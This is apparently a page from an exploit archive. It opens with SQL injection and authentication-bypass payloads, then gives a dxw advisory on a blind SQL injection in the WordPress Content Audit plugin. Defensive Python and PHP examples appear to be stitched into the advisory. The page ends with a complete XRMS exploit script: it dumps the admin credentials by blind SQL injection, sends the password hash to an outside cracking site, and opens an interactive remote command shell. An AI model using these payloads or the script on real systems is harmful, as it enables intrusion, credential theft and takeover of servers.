if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/ => 12.496 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.577 s
 
Insecure Cookie Handling :
 
admin.php
 
javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";
 
Auth Bypass :
 
admin.php
 
 Username : azerty' or '1=1--# Real admin name
 Password : demo1 ' or ' 1=1 or ADmin or  any thing


2 Oct 2014

WordPress Content Audit 1.6 Blind SQL Injection

Details
================
Software: Content Audit
Version: 1.6
Homepage: http://wordpress.org/plugins/content-audit/
Advisory report: https://security.dxw.com/advisories/blind-sqli-vulnerability-in-content-audit-could-allow-a-privileged-attacker-to-exfiltrate-password-hashes/
CVE: CVE-2014-5389
CVSS: 3.6 (Low; AV:N/AC:H/Au:S/C:P/I:N/A:P)
 
Description
================
Blind SQLi vulnerability in Content Audit could allow a privileged attacker to exfiltrate password hashes
 
Vulnerability
================
An attacker with an admin account is able to add arbitrary text in the “Audited content types” option by using a DOM inspector to modify the value of a checkbox field. This text is then inserted into an SQL query and executed as part of a daily wp-cron job.
The fact that this is run only once a day makes it rather minor. An attacker would potentially need to poll /wp-cron.php repeatedly for 24 hours until they got the first result. As blind SQL injection attacks are usually done by comparing the first character to all possible characters – one at a time, until a match is found – it would take a very long time to exfiltrate useful data.
However, we don’t discount the possibility that someone cleverer than us could figure out a more practical attack.
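The option text described above travels from a browser-editable checkbox value into a query that the daily cron job runs. The following Python script is an added example, not the plugin's code: it shows the shape of safe handling for such an option, allowlisting the submitted content types against the registered post types before they are stored, and then binding them as an IN list so the stored option is never spliced into SQL text (the post table, the set of registered post types, the rows and the cutoff date are constructed assumptions).

```python
import sqlite3

# Constructed stand-ins for WordPress's registered post types and for the post
# rows the scheduled job would inspect. Not the plugin's own code or data.
REGISTERED_POST_TYPES = {"post", "page", "attachment"}

POSTS = [
    (1, "post", "2013-08-12"),
    (2, "page", "2013-12-31"),
    (3, "attachment", "2014-01-10"),
    (4, "post", "2014-06-01"),
]


def _connect():
    """In-memory SQLite database seeded with the constructed posts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER, post_type TEXT, post_modified TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", POSTS)
    return conn


def sanitize_content_types(submitted):
    """Allowlist the option on save: a checkbox value edited in the DOM inspector
    to anything other than a registered post type is dropped, so no
    attacker-controlled text ever reaches the stored option."""
    return sorted(t for t in submitted if t in REGISTERED_POST_TYPES)


def outdated_posts(content_types, cutoff):
    """Equivalent of the daily job's query: one bound placeholder per content
    type and one for the cutoff date, instead of splicing option text into SQL.
    Posts of the selected types modified before the cutoff are returned."""
    types = sanitize_content_types(content_types)
    if not types:
        return []
    placeholders = ",".join("?" * len(types))
    sql = ("SELECT id FROM posts WHERE post_type IN (%s) AND post_modified < ? "
           "ORDER BY id" % placeholders)
    conn = _connect()
    try:
        return [row[0] for row in conn.execute(sql, types + [cutoff])]
    finally:
        conn.close()


if __name__ == "__main__":
    # A tampered submission: the second value is the kind of text an edited
    # checkbox could carry. It is dropped before storage and never reaches SQL.
    tampered = ["post", "') OR sleep(5) OR ('"]
    print(sanitize_content_types(tampered))        # ['post']
    print(outdated_posts(tampered, "2014-01-01"))  # [1]
```

The allowlist is the part that closes the hole described in the advisory: the query then only ever sees values the application itself registered, and the placeholders make the remaining values harmless even if the allowlist were later widened.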
 
Proof of concept
================
Steps an attacker may take:
 
Visit /wp-admin/options-general.php?page=content-audit
Check an “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to something which does sleep(5) if the first byte of the admin’s password hash is ‘a’ or sleep(10) otherwise
Press “Update Options”
Poll /wp-cron.php repeatedly until it takes longer than 5 seconds and record how long the request took
Repeat
 
Steps to take to verify that this issue exists:
 
Visit /wp-admin/options-general.php?page=content-audit
Check an “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to “‘” (a single apostrophe)
Press “Update Options”
Add “add_action(‘init’, ‘content_audit_mark_outdated’);” to content-audit-schedule.php somewhere and load any page
This error should occur: “WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘2013-08-12′”
If you replace “$oldposts = $wpdb->get_results” with “echo” on line 134 of content-audit-schedule.php you’ll notice that it’s inserting the ‘ unescaped – which means that you can insert whatever you like
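To make the defect and its fix concrete, here is an added example (not the plugin's code, but a hypothetical reconstruction of the pattern the advisory describes): the option saved from the checkboxes is concatenated into the query the cron job runs, shown beside a version that allow-lists the values against registered post types and binds them with $wpdb->prepare(). All option, hook and function names here are assumed.

```php
<?php
// Added example, not the plugin's code: a hypothetical reconstruction of the
// pattern the advisory describes (an admin-editable option spliced into the
// SQL run by the daily cron job), beside a hardened form. All option, hook
// and function names here are assumed.

// Vulnerable shape: the saved checkbox values are concatenated into the query.
// A value edited in the DOM inspector reaches MySQL as SQL text; a lone
// apostrophe breaks the statement just before the date literal, which matches
// the "syntax ... near '2013-08-12'" error in the advisory's verification steps.
function ca_mark_outdated_vulnerable() {
    global $wpdb;
    $types  = (array) get_option( 'content_audit_types', array() );
    $cutoff = date( 'Y-m-d', strtotime( '-1 year' ) );
    $in     = "'" . implode( "','", $types ) . "'";
    return $wpdb->get_results(
        "SELECT ID FROM {$wpdb->posts} WHERE post_type IN ({$in}) AND post_modified < '{$cutoff}'"
    );
}

// Hardened form: keep only values that are registered post types (allow-list)
// and bind every value with $wpdb->prepare(), so option text is never parsed
// as SQL even if an administrator's browser or account is compromised.
function ca_mark_outdated_hardened() {
    global $wpdb;
    $saved   = (array) get_option( 'content_audit_types', array() );
    $allowed = get_post_types( array( 'public' => true ), 'names' );
    $types   = array_values( array_intersect( $saved, $allowed ) );
    if ( empty( $types ) ) {
        return array();
    }
    $cutoff       = date( 'Y-m-d', strtotime( '-1 year' ) );
    $placeholders = implode( ',', array_fill( 0, count( $types ), '%s' ) );
    $sql = $wpdb->prepare(
        "SELECT ID FROM {$wpdb->posts} WHERE post_type IN ({$placeholders}) AND post_modified < %s",
        array_merge( $types, array( $cutoff ) )
    );
    return $wpdb->get_results( $sql );
}

// Second layer: sanitize on save, so the stored option can never hold free text.
function ca_sanitize_types( $value ) {
    $allowed = get_post_types( array( 'public' => true ), 'names' );
    return array_values( array_intersect( (array) $value, $allowed ) );
}
register_setting( 'content_audit_options', 'content_audit_types', 'ca_sanitize_types' );
add_action( 'content_audit_daily_event', 'ca_mark_outdated_hardened' ); // assumed cron hook
```

The allow-list on save is what removes the attack surface entirely; prepare() alone would still leave a bad value failing the query rather than executing attacker text.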
 
 
Mitigations
================
You should update to version 1.62.
 
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
 
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
 
This vulnerability will be published if we do not receive a response to this report within 14 days.
 
Timeline
================
 
2014-08-11 – Discovered
2014-08-21 – Requested author email address via a contact form
2014-08-27 – Reported to author via email
2014-09-22 – No response from author; reminder sent
2014-09-23 – Author responded
2014-09-24 – Fix released
2014-10-01 – Published
 
 
 
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.


28Aug/14

XRMS Blind SQL Injection / Command Execution

#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
 
import urllib
import urllib2
import time
import sys
 
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
  print """      ____                                      
     / __/_  ______ _  _  ___________ ___  _____
    / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
   / __/ /_/ / /_/ / _>  </ /  / / / / / (__  ) 
  /_/  \__,_/\__, (_)_/|_/_/  /_/ /_/ /_/____/  
               /_/                              
  [+] fuq th3 w0rld, fuq ur m0m!\n"""
 
def usage():
  print "  [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
  print "  [+] Example:"
  print "  [+] python " + sys.argv[0] + " domain.to/xrms"
  quit()
 
def sendhashaway(hash):
  print " [+] Sending hash to icrackhash.com to be cracked."
  data = None
  headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
  url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
  gh = urllib2.Request(url,data,headers)
  gh2 = urllib2.urlopen(gh)
  output = gh2.read()
  plaintext = getpositions(output,'<td><small><strong>','</strong>')
  print " [-] Plaintext of hash: " +plaintext + "\n"
  return plaintext
 
def username(length):
  length = length + 1
  duser = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
  for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          duser.append(usercharac[f])
          found = 1
  return duser
 
def getusernamelength():
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
  payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
  while (found != 1): 
    class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
      def http_error_302(self, req, fp, code, msg, headers):
        infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
        infourl.status = code
        infourl.code = code
        return infourl
      http_error_300 = http_error_302    
    class HeadRequest(urllib2.Request):
      def get_method(self):
        return "POST"
    payload = payload1 + str(i) + payload2
    data = urllib.urlencode([('user_id',payload)])
    url = 'http://'+domain+'/plugins/webform/new-form.php'
    opener = urllib2.build_opener(LeHTTPRedirectHandler)
    req = HeadRequest(url,data)
    prepare = opener.open(req)
    cookie1 = prepare.info()
    cookie2pos1 = str(cookie1).find('PHPSESSID')
    cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
    line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
    line = 'XRMS' + line[9:]
    url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
    headers = { 'Cookie' : line }
    data = None
    start = time.time()
    get = urllib2.Request(url,data,headers)
    get.get_method = lambda: 'HEAD'
    try:
      execute = urllib2.urlopen(get)
    except:
      pass
    elapsed = (time.time() - start)
    if(elapsed > 1):
      print "  Length found at position: " + str(i)
      found = 1
      length = i
      return length
    i = i + 1
 
def password(length):
  length = length + 1
  dpassword = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
  for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          dpassword.append(usercharac[f])
          found = 1
  return dpassword
 
def login(domain,user,password):
  cookie = "XRMS=iseeurgettinown4d"
  url = 'http://'+domain+'/login-2.php'
  headers = { 'Cookie' : cookie }
  data = urllib.urlencode([('username',user),('password',password)])
  a1 = urllib2.Request(url,data,headers)
  a2 = urllib2.urlopen(a1)
  output = a2.read()
  if output.find('PEAR.php') > 0:
    print "  [+] Logged In"
 
def commandexec(domain,command):
  cookie = "XRMS=iseeurgettinown4d"
  cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
  headers = { 'Cookie' : cookie }
  data = None
  url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
  b1 = urllib2.Request(url,data,headers)
  b2 = urllib2.urlopen(b1)
  output = b2.read()
  first = output.find('0x41') + 4
  last = output.find('14x0') - 4
  return output[first:last]
 
banner()
if len(sys.argv) < 2:
  usage()
domain = sys.argv[1]
print "  [+] Grabbing username length"
length = getusernamelength()
print "  [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print "  [+] Grabbing password hash"
tmppass =  password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print "  [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
  cmd = raw_input('  [+] Run a command: ')
  if cmd == 'quit':
    print "  [-] Hope you had fun :)"
    quit = 1
  if cmd != 'quit':
    print "  [+] "+ commandexec(domain,cmd)
